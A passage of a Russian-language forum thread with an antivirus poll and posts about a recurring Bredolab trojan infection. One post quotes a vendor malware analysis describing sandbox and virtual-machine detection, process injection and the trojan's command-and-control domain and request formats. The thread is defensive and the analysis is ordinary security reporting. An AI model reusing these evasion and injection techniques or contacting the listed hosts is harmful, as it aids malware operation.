Беседка

Форум православной молодежи Беларуси
Текущее время: 17 ноя 2018, 13:46

Часовой пояс: UTC + 2 часа [ Летнее время ]




Начать новую тему Ответить на тему  [ Сообщений: 120 ]  На страницу Пред.  1 ... 4, 5, 6, 7, 8  След.

У кого какой антивирус?
AVG 2%  2%  [ 1 ]
Avast 13%  13%  [ 7 ]
Dr. Web 8%  8%  [ 4 ]
eTrust 0%  0%  [ 0 ]
Kaspersky 31%  31%  [ 16 ]
NOD 32 27%  27%  [ 14 ]
Norton 4%  4%  [ 2 ]
Panda 0%  0%  [ 0 ]
PC Cillin 0%  0%  [ 0 ]
Другой 15%  15%  [ 8 ]
Всего голосов : 52
Автор Сообщение
 Заголовок сообщения:
СообщениеДобавлено: 10 янв 2010, 03:18 
Не в сети
Страж форума
Аватара пользователя

Зарегистрирован: 14 фев 2006, 17:30
Сообщения: 4807
Откуда: Минск
Скачал архив проверить свой старенький Касперский 5.0.124 с базами двухнедельной давности.
Пишет следующее:
проверено объектов 8125 (откуда такая цифра - непонятно)
обнаружено вирусов 4814 (что по ходу статьи круче самого нового 2010 Касперского :))
обезврежено вирусов 1659
удалено объектов 3155
помещено в карантин 0 (в настройках поставил не ставить, а удалять)
Так что рулят не только новые версии Касперыча, но и очень старые с новыми базами. :)


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 11 янв 2010, 10:27 
Не в сети
Малость отвязанный
Аватара пользователя

Зарегистрирован: 29 мар 2005, 19:40
Сообщения: 3261
очень старые еще и очень тормозят :)


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 13 янв 2010, 01:01 
Не в сети
Постоялец
Аватара пользователя

Зарегистрирован: 30 май 2009, 09:50
Сообщения: 389
Откуда: Гомель-Уваровичи
появился вирус Win32:Bredolab-BL [Trj]
Аваст его удаляет, а при подключении к нету он опять обнаруживается.
:lam:

_________________
Ядовитые ягоды - лекарство. Если есть их правильно.


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 13 янв 2010, 01:04 
Не в сети
Постоялец
Аватара пользователя

Зарегистрирован: 30 май 2009, 09:50
Сообщения: 389
Откуда: Гомель-Уваровичи
C:\DOCUME~1\9335~1\LOCALS~1\Temp\308.exe
Троян

_________________
Ядовитые ягоды - лекарство. Если есть их правильно.


Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Антивирусы
СообщениеДобавлено: 13 янв 2010, 19:39 
Не в сети
Наш чел

Зарегистрирован: 05 авг 2009, 22:11
Сообщения: 851
Вирус Backdoor.Win32.Bredolab.d

Другие названия данного вируса:

Trojan: Generic Downloader.x!cg (McAfee)
Mal/Generic-A (Sophos)
Trojan.Crypt-204 (ClamAV)
Generic Trojan (Panda)
W32/Trojan2.HPLU (FPROT)
TrojanDownloader:Win32/Bredolab.X (MS(OneCare))
Win32/TrojanDownloader.Bredolab.AA trojan (Nod32)
Trojan.Generic.1651456 (BitDef7)
Trojan.Inject.MWT (VirusBuster)
Win32:Trojan-gen {Other} (AVAST)
Trojan-Downloader.Win32.Bredolab (Ikarus)
SHeur2.ACUB (AVG)
TR/Crypt.XPACK.Gen (AVIRA)
Trojan Horse (NAV)
W32/Smalltroj.OCHC (Norman)


Тип вируса: Загрузчик вредоносных программ

Уязвимые ОС: Win95/98/Me/NT/2000/XP

Размер: 1 632

Упакован: FSG



Техническая информация

Троянская программа, предназначенная для загрузки с удалённого ресурса на компьютер вредоносной программы для рассылки спама - Trojan.Spambot.


Деструктивная активность
Проверяет наличие файлов %System%\drivers\hgfs.sys, %System%\drivers\prleth.sys, %System%\drivers\vmhgfs.sys, наличие библиотек dbghelp.dll, sbiedll.dll в своем адресном пространстве. В случае обнаружения завершается.

Проверяет ключ реестра:

HKLM\HARDWARE\Description\System\SystemBiosVersion, в этом значении ищет вхождение строки «VBOX», в случае обнаружения завершается.

Чтобы исключить возможность исполнения себя в SandBox, проверяет несоответствие:

Имя пользователя — CurrentUser, Sandbox;
Имя компьютера — SANDBOX;
Имя пользователя — user и имя пользователя — USER;
Значения ключа ProductID в HKLM\Microsoft\Windows\CurrentVersion:
55274-640-2673064-23950 (JoeBox)
76487-644-3177037-23510 (CWSandbox)
76487-337-8429955-22614 (Anubis)
Проверяет имя, соответствующее запускаемому файлу:

Если имя grpconv.exe, проверяет наличие в системе процесса cfp.exe. В случае обнаружения перемещает себя в %Temp%\~TM%TempName%, завершается.
В противном случае создает новый процесс svchost.exe, инжектит в него свою часть, запускает в нем новый поток, завершается.
Если имя explorer.exe, проверяет наличие файла %Temp%\~TM27FB4A.TMP, если находит, то в HKCU\SoftWare\Microsoft\WindowsNT\CurrentVersion\Winlogon устанавливает значение ключа RunGrpCon в 1, перемещает
%Temp%\~TM27FB4A.TMP в %System%\Wbem\grpconv.exe, устанавливает у
%System%\Wbem\grpconv.exe атрибуты времени такие же как у
%System%\smss.exe, удаляет файлы %System%\grpconv.exe,
%System%\dllcache\grpconv.exe.
Создает мьютекс с именем _SYSTEM_4D2EF3A_.
Создает новый процесс svchost.exe, инжектит в него свою часть, запускает в нем новый поток, завершается.
В случае произвольного имени, проверяет наличие в системе процесса cfp.exe. В случае обнаружения перемещает себя в %Temp%\~TM%TempName%, завершается.
В противном случае копирует себя в %Temp%\~TM27FB4A.TMP, инжектит себя в explorer.exe, запускает в нем новый поток, перемещает себя в %Temp%\~TM%TempName%, завершается.

Во всех случаях осуществляет проверку соответствия загруженных в свое адресное пространство модулей kernel.dll и ntdll.dll с файлами-образами на диске в %System%. В kernel32.dll проверяет корректность функций CreateRemoteThread, WriteProcessMemory, VirtualProtectEx, VirtualAllocEx, в ntdll.dll функций — ZwAllocateVirtualMemory, ZwWriteVirtualMemory, ZwProtectVirtualMemory, ZwCreateThread, ZwAdjustPrivelegesToken, ZwOpenProcess, ZwOpenThread, ZwQueueApcThread и автоматически производит корректировку при несоответствии (anti-sandbox).
Работа svchost.exe:

Производится циклическая попытка подключения к jobfinder911.com.

При удачном подключении отправляется GET-запрос:

GET /l/controller.php?action=bot&entity_list={числа через запятую}
&uid=11&first={0|1}&guid={VolumeSerialNumber}&rnd=6293712
На основании полученного содержимого и значения поля Magic-Number, в котором хранится длина ключа и значение самого ключа, происходит расшифровка данных, которые могут записываться либо в новый файл
%Windows%\Temp\wpv%rand_number%.exe, с дальнейшим запуском файла, либо данные записываются в новый создаваемый процесс svchost (для этого случая установлен перехватчик функции ZwResumeThread из ntdll.dll, осуществляющий запись зловреда — функция вызывается из используемой CreateProcess).

Второй GET-запрос вида:

GET /l/controller.php?action=report&guid=0&rnd=6293712&uid=11&
entity={число:unique_start|unique_failed|repeat_start|repeat_failed;число:...}
Осуществляется запись служебной информации в %APPDATA%\wiaserva.log.

источник: http://www.drweb.com/
________ http://www.securelist.com/ru/


Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Антивирусы
СообщениеДобавлено: 15 янв 2010, 02:38 
Не в сети
Постоялец
Аватара пользователя

Зарегистрирован: 30 май 2009, 09:50
Сообщения: 389
Откуда: Гомель-Уваровичи
я :mushki:

_________________
Ядовитые ягоды - лекарство. Если есть их правильно.


Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Антивирусы
СообщениеДобавлено: 15 янв 2010, 12:33 
Не в сети
Наш чел

Зарегистрирован: 05 авг 2009, 22:11
Сообщения: 851
Петрович, а вы еще чем-нибудь пробывали лечить?


Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Антивирусы
СообщениеДобавлено: 15 янв 2010, 14:23 
Не в сети
Постоялец
Аватара пользователя

Зарегистрирован: 30 май 2009, 09:50
Сообщения: 389
Откуда: Гомель-Уваровичи
какие лекарства пропишешь?

еще начали открываться http://www.whackingstuff.com/index.php/computers
http://www.markstories.com/index.php/adventure

_________________
Ядовитые ягоды - лекарство. Если есть их правильно.


Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Антивирусы
СообщениеДобавлено: 15 янв 2010, 14:41 
Не в сети
Наш чел

Зарегистрирован: 05 авг 2009, 22:11
Сообщения: 851
Может если трафик позволяет скачать лечащую утилиту от "доктор веб".

сейчас по сети полазил, из любопытства что говорят о AVAST, самое главное достоинство, что он бесплатен, но "доктор" и "Касперский" в сравнении с ним по отзывам лучше.

если бы сам столкнулся с такой проблемой и не мог вылечить, наверное бы переустановил Windows, мне так проще.


Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Антивирусы
СообщениеДобавлено: 15 янв 2010, 17:55 
Не в сети
Постоялец
Аватара пользователя

Зарегистрирован: 30 май 2009, 09:50
Сообщения: 389
Откуда: Гомель-Уваровичи
Возможно после той утилиты доктора веба и появился вирус.
Думал поставить новую винд7, но стоит ли? Какие его преимущества?
А потом. Вирус не болит. Мешает немного - антивирусник кричит.

_________________
Ядовитые ягоды - лекарство. Если есть их правильно.


Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Антивирусы
СообщениеДобавлено: 15 янв 2010, 18:36 
Не в сети
Наш чел

Зарегистрирован: 05 авг 2009, 22:11
Сообщения: 851
Петрович, тот вирус загрузчик, ваш компьютер с ним попадает в бот-сеть и при желании хозяина вируса(что загрузит на машину этот загрузчик) ваш интернет трафик будет расходываться на рассылку спама; конечно, данный тип вирусов не заитересован чтоб окончательно "положить" систему, наоборот, этому вирусу нужно чтоб ваш компьютер всегда был наготове разослать спам или еще что-нибудь без вашего ведома.


Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Антивирусы
СообщениеДобавлено: 15 янв 2010, 19:49 
Не в сети
Наш чел

Зарегистрирован: 05 авг 2009, 22:11
Сообщения: 851
Петрович писал(а):
какие лекарства пропишешь?

еще начали открываться h ttp:// w w w.
h ttp://w w w .


возможно это взломанные сайты, походив по которым, можно что нибудь подцепить.

(полные адреса сайтов в цитату не включил)


Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Антивирусы
СообщениеДобавлено: 15 янв 2010, 22:23 
Не в сети
Постоялец
Аватара пользователя

Зарегистрирован: 30 май 2009, 09:50
Сообщения: 389
Откуда: Гомель-Уваровичи
так Аваст его удаляет, а он появляется вновь., где он ховается?? может в самом авасте?
возможно его появление связано с обновлением самой авасты

_________________
Ядовитые ягоды - лекарство. Если есть их правильно.


Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Антивирусы
СообщениеДобавлено: 15 янв 2010, 22:44 
Не в сети
Наш чел

Зарегистрирован: 05 авг 2009, 22:11
Сообщения: 851
Avast удаляет сам файл вируса, а вот настройки реестра и какие либо другие настройки, возможно, он изменить не может, в которых к примеру прописано, что при подключении к нету выполнить такие то действия, почему и рекомендуют при очистке от определенных вирусов воостанавливать реестр, каким он был до появления вируса. Это как я понимаю. Хотя повторюсь, может проще переустановить будет Windows.


Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Антивирусы
СообщениеДобавлено: 15 янв 2010, 22:53 
Не в сети
Наш чел

Зарегистрирован: 05 авг 2009, 22:11
Сообщения: 851
Петрович, перечитал счас описание вируса и то, что ваш антивирус находит, если правильно понял, ваш антивир уже находит файл сформированный впоследствии действия вируса, а вот то, что именно этот вирусный файл формирует (этот файл формируется на основе данных полученных с нета), антивирус не видет.

Я в этом слишком слаб, но мне кажется дело обстоит так.


Вернуться к началу
 Профиль  
 
Показать сообщения за:  Поле сортировки  
Начать новую тему Ответить на тему  [ Сообщений: 120 ]  На страницу Пред.  1 ... 4, 5, 6, 7, 8  След.

Часовой пояс: UTC + 2 часа [ Летнее время ]


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 2


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Найти:
Перейти:  
cron
Создано на основе phpBB® Forum Software © phpBB Group
Русская поддержка phpBB
Мобильный вид